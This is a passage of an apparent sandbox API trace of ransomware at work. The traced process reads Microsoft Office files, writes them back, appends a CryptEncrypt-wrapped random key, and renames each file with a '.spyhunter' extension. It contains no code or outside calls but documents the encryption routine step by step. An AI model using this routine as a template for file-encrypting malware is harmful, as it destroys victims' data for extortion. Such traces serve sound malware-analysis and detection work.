Office\\MEDIA\\OFFICE14\\BULLETS\\BD21504_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21504_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0101.897] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21504_.GIF") returned 73 [0101.897] StrStrW (lpFirst="BD21504_.GIF", lpSrch=".txt") returned 0x0 [0101.898] GetProcessHeap () returned 0x2c0000 [0101.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0101.898] ReadFile (in: hFile=0x16c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fba4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fba4*=0xb6, lpOverlapped=0x0) returned 1 [0101.899] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffff4a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0101.899] WriteFile (in: hFile=0x16c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xb6, lpNumberOfBytesWritten=0x248fba4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fba4*=0xb6, lpOverlapped=0x0) returned 1 [0101.899] GetProcessHeap () returned 0x2c0000 [0101.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0101.899] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.899] WriteFile (in: hFile=0x16c, lpBuffer=0x248fbe4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fba4, lpOverlapped=0x0 | out: lpBuffer=0x248fbe4*, lpNumberOfBytesWritten=0x248fba4*=0x4, lpOverlapped=0x0) returned 1 [0101.899] WriteFile (in: hFile=0x16c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fba4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fba4*=0x30, lpOverlapped=0x0) returned 1 [0101.899] CloseHandle (hObject=0x16c) returned 1 [0101.899] GetProcessHeap () returned 0x2c0000 [0101.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cb6288 [0101.900] wnsprintfW (in: pszDest=0x2cb6288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21504_.GIF.spyhunter") returned 83 [0101.900] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21504_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21504_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21504_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21504_.gif.spyhunter")) returned 1 [0101.900] GetProcessHeap () returned 0x2c0000 [0101.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cb6288 | out: hHeap=0x2c0000) returned 1 [0101.900] GetProcessHeap () returned 0x2c0000 [0101.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0101.900] GetProcessHeap () returned 0x2c0000 [0101.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33bce0 | out: hHeap=0x2c0000) returned 1 [0101.901] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fbe8 | out: pbBuffer=0x248fbe8) returned 1 [0101.901] GetProcessHeap () returned 0x2c0000 [0101.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0101.901] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fbe0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fbe0*=0x30) returned 1 [0101.901] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21503_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21503_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0101.901] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21503_.GIF") returned 73 [0101.901] StrStrW (lpFirst="BD21503_.GIF", lpSrch=".txt") returned 0x0 [0101.901] GetProcessHeap () returned 0x2c0000 [0101.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0101.901] ReadFile (in: hFile=0x16c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fba4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fba4*=0xfe, lpOverlapped=0x0) returned 1 [0101.902] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffff02, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0101.902] WriteFile (in: hFile=0x16c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xfe, lpNumberOfBytesWritten=0x248fba4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fba4*=0xfe, lpOverlapped=0x0) returned 1 [0101.902] GetProcessHeap () returned 0x2c0000 [0101.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0101.902] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.902] WriteFile (in: hFile=0x16c, lpBuffer=0x248fbe4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fba4, lpOverlapped=0x0 | out: lpBuffer=0x248fbe4*, lpNumberOfBytesWritten=0x248fba4*=0x4, lpOverlapped=0x0) returned 1 [0101.902] WriteFile (in: hFile=0x16c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fba4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fba4*=0x30, lpOverlapped=0x0) returned 1 [0101.903] CloseHandle (hObject=0x16c) returned 1 [0101.903] GetProcessHeap () returned 0x2c0000 [0101.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cb6288 [0101.903] wnsprintfW (in: pszDest=0x2cb6288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21503_.GIF.spyhunter") returned 83 [0101.903] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21503_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21503_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21503_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21503_.gif.spyhunter")) returned 1 [0101.906] GetProcessHeap () returned 0x2c0000 [0101.910] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cb6288 | out: hHeap=0x2c0000) returned 1 [0101.916] GetProcessHeap () returned 0x2c0000 [0101.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0101.917] GetProcessHeap () returned 0x2c0000 [0101.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33bc00 | out: hHeap=0x2c0000) returned 1 [0101.917] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fbe0 | out: pbBuffer=0x248fbe0) returned 1 [0101.917] GetProcessHeap () returned 0x2c0000 [0101.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0101.917] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fbd8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fbd8*=0x30) returned 1 [0101.917] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21482_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21482_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0101.918] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21482_.GIF") returned 73 [0101.918] StrStrW (lpFirst="BD21482_.GIF", lpSrch=".txt") returned 0x0 [0101.918] GetProcessHeap () returned 0x2c0000 [0101.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0101.918] ReadFile (in: hFile=0x16c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fb9c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fb9c*=0xf7, lpOverlapped=0x0) returned 1 [0101.919] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffff09, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0101.919] WriteFile (in: hFile=0x16c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xf7, lpNumberOfBytesWritten=0x248fb9c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fb9c*=0xf7, lpOverlapped=0x0) returned 1 [0101.919] GetProcessHeap () returned 0x2c0000 [0101.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0101.919] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.920] WriteFile (in: hFile=0x16c, lpBuffer=0x248fbdc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fb9c, lpOverlapped=0x0 | out: lpBuffer=0x248fbdc*, lpNumberOfBytesWritten=0x248fb9c*=0x4, lpOverlapped=0x0) returned 1 [0101.920] WriteFile (in: hFile=0x16c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fb9c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fb9c*=0x30, lpOverlapped=0x0) returned 1 [0101.920] CloseHandle (hObject=0x16c) returned 1 [0101.920] GetProcessHeap () returned 0x2c0000 [0101.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cb6288 [0101.920] wnsprintfW (in: pszDest=0x2cb6288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21482_.GIF.spyhunter") returned 83 [0101.920] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21482_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21482_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21482_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21482_.gif.spyhunter")) returned 1 [0101.920] GetProcessHeap () returned 0x2c0000 [0101.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cb6288 | out: hHeap=0x2c0000) returned 1 [0101.921] GetProcessHeap () returned 0x2c0000 [0101.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0101.921] GetProcessHeap () returned 0x2c0000 [0101.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33bb20 | out: hHeap=0x2c0000) returned 1 [0101.921] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fbe0 | out: pbBuffer=0x248fbe0) returned 1 [0101.921] GetProcessHeap () returned 0x2c0000 [0101.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0101.921] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fbd8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fbd8*=0x30) returned 1 [0101.921] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21481_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21481_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0101.937] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21481_.GIF") returned 73 [0101.937] StrStrW (lpFirst="BD21481_.GIF", lpSrch=".txt") returned 0x0 [0101.937] GetProcessHeap () returned 0x2c0000 [0101.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0101.937] ReadFile (in: hFile=0x16c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fb9c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fb9c*=0xeb, lpOverlapped=0x0) returned 1 [0101.938] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffff15, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0101.938] WriteFile (in: hFile=0x16c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xeb, lpNumberOfBytesWritten=0x248fb9c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fb9c*=0xeb, lpOverlapped=0x0) returned 1 [0101.938] GetProcessHeap () returned 0x2c0000 [0101.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0101.938] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.938] WriteFile (in: hFile=0x16c, lpBuffer=0x248fbdc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fb9c, lpOverlapped=0x0 | out: lpBuffer=0x248fbdc*, lpNumberOfBytesWritten=0x248fb9c*=0x4, lpOverlapped=0x0) returned 1 [0101.938] WriteFile (in: hFile=0x16c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fb9c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fb9c*=0x30, lpOverlapped=0x0) returned 1 [0101.938] CloseHandle (hObject=0x16c) returned 1 [0101.938] GetProcessHeap () returned 0x2c0000 [0101.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cb6288 [0101.938] wnsprintfW (in: pszDest=0x2cb6288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21481_.GIF.spyhunter") returned 83 [0101.939] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21481_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21481_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21481_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21481_.gif.spyhunter")) returned 1 [0102.493] GetProcessHeap () returned 0x2c0000 [0102.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cb6288 | out: hHeap=0x2c0000) returned 1 [0102.493] GetProcessHeap () returned 0x2c0000 [0102.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0102.493] GetProcessHeap () returned 0x2c0000 [0102.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33ba40 | out: hHeap=0x2c0000) returned 1 [0102.493] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fbd8 | out: pbBuffer=0x248fbd8) returned 1 [0102.493] GetProcessHeap () returned 0x2c0000 [0102.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0102.493] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fbd0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fbd0*=0x30) returned 1 [0102.494] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15156_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd15156_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0102.523] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15156_.GIF") returned 71 [0102.523] StrStrW (lpFirst="BD15156_.GIF", lpSrch=".txt") returned 0x0 [0102.523] GetProcessHeap () returned 0x2c0000 [0102.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0102.523] ReadFile (in: hFile=0xb4, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fb94, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248fb94*=0x143, lpOverlapped=0x0) returned 1 [0102.524] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffebd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0102.524] WriteFile (in: hFile=0xb4, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x143, lpNumberOfBytesWritten=0x248fb94, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248fb94*=0x143, lpOverlapped=0x0) returned 1 [0102.524] GetProcessHeap () returned 0x2c0000 [0102.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0102.525] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.525] WriteFile (in: hFile=0xb4, lpBuffer=0x248fbd4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fb94, lpOverlapped=0x0 | out: lpBuffer=0x248fbd4*, lpNumberOfBytesWritten=0x248fb94*=0x4, lpOverlapped=0x0) returned 1 [0102.525] WriteFile (in: hFile=0xb4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fb94, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fb94*=0x30, lpOverlapped=0x0) returned 1 [0102.526] CloseHandle (hObject=0xb4) returned 1 [0102.526] GetProcessHeap () returned 0x2c0000 [0102.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cb6288 [0102.526] wnsprintfW (in: pszDest=0x2cb6288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15156_.GIF.spyhunter") returned 81 [0102.526] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15156_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd15156_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15156_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd15156_.gif.spyhunter")) returned 1 [0102.527] GetProcessHeap () returned 0x2c0000 [0102.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cb6288 | out: hHeap=0x2c0000) returned 1 [0102.527] GetProcessHeap () returned 0x2c0000 [0102.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0102.527] GetProcessHeap () returned 0x2c0000 [0102.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c183a8 | out: hHeap=0x2c0000) returned 1 [0102.527] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fbd8 | out: pbBuffer=0x248fbd8) returned 1 [0102.527] GetProcessHeap () returned 0x2c0000 [0102.527] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0102.527] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fbd0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fbd0*=0x30) returned 1 [0102.527] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\lines.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0102.528] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL") returned 68 [0102.529] StrStrW (lpFirst="LINES.DLL", lpSrch=".txt") returned 0x0 [0102.530] GetProcessHeap () returned 0x2c0000 [0102.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0102.530] ReadFile (in: hFile=0xb4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fb94, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248fb94*=0x2800, lpOverlapped=0x0) returned 1 [0102.554] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0102.554] WriteFile (in: hFile=0xb4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fb94, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248fb94*=0x2800, lpOverlapped=0x0) returned 1 [0102.554] GetProcessHeap () returned 0x2c0000 [0102.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0102.555] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.555] WriteFile (in: hFile=0xb4, lpBuffer=0x248fbd4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fb94, lpOverlapped=0x0 | out: lpBuffer=0x248fbd4*, lpNumberOfBytesWritten=0x248fb94*=0x4, lpOverlapped=0x0) returned 1 [0102.561] WriteFile (in: hFile=0xb4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fb94, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fb94*=0x30, lpOverlapped=0x0) returned 1 [0102.561] CloseHandle (hObject=0xb4) returned 1 [0102.710] GetProcessHeap () returned 0x2c0000 [0102.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c961f8 [0102.710] wnsprintfW (in: pszDest=0x2c961f8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL.spyhunter") returned 78 [0102.710] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\lines.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\lines.dll.spyhunter")) returned 1 [0102.711] GetProcessHeap () returned 0x2c0000 [0102.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c961f8 | out: hHeap=0x2c0000) returned 1 [0102.711] GetProcessHeap () returned 0x2c0000 [0102.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0102.711] GetProcessHeap () returned 0x2c0000 [0102.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cf83c0 | out: hHeap=0x2c0000) returned 1 [0102.711] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fbd0 | out: pbBuffer=0x248fbd0) returned 1 [0102.711] GetProcessHeap () returned 0x2c0000 [0102.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0102.711] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fbc8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fbc8*=0x30) returned 1 [0102.711] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0103.323] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_F_COL.HXK") returned 65 [0103.323] StrStrW (lpFirst="OIS_F_COL.HXK", lpSrch=".txt") returned 0x0 [0103.323] GetProcessHeap () returned 0x2c0000 [0103.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0103.323] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fb8c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248fb8c*=0x72, lpOverlapped=0x0) returned 1 [0103.324] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffff8e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0103.324] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x72, lpNumberOfBytesWritten=0x248fb8c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248fb8c*=0x72, lpOverlapped=0x0) returned 1 [0103.324] GetProcessHeap () returned 0x2c0000 [0103.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 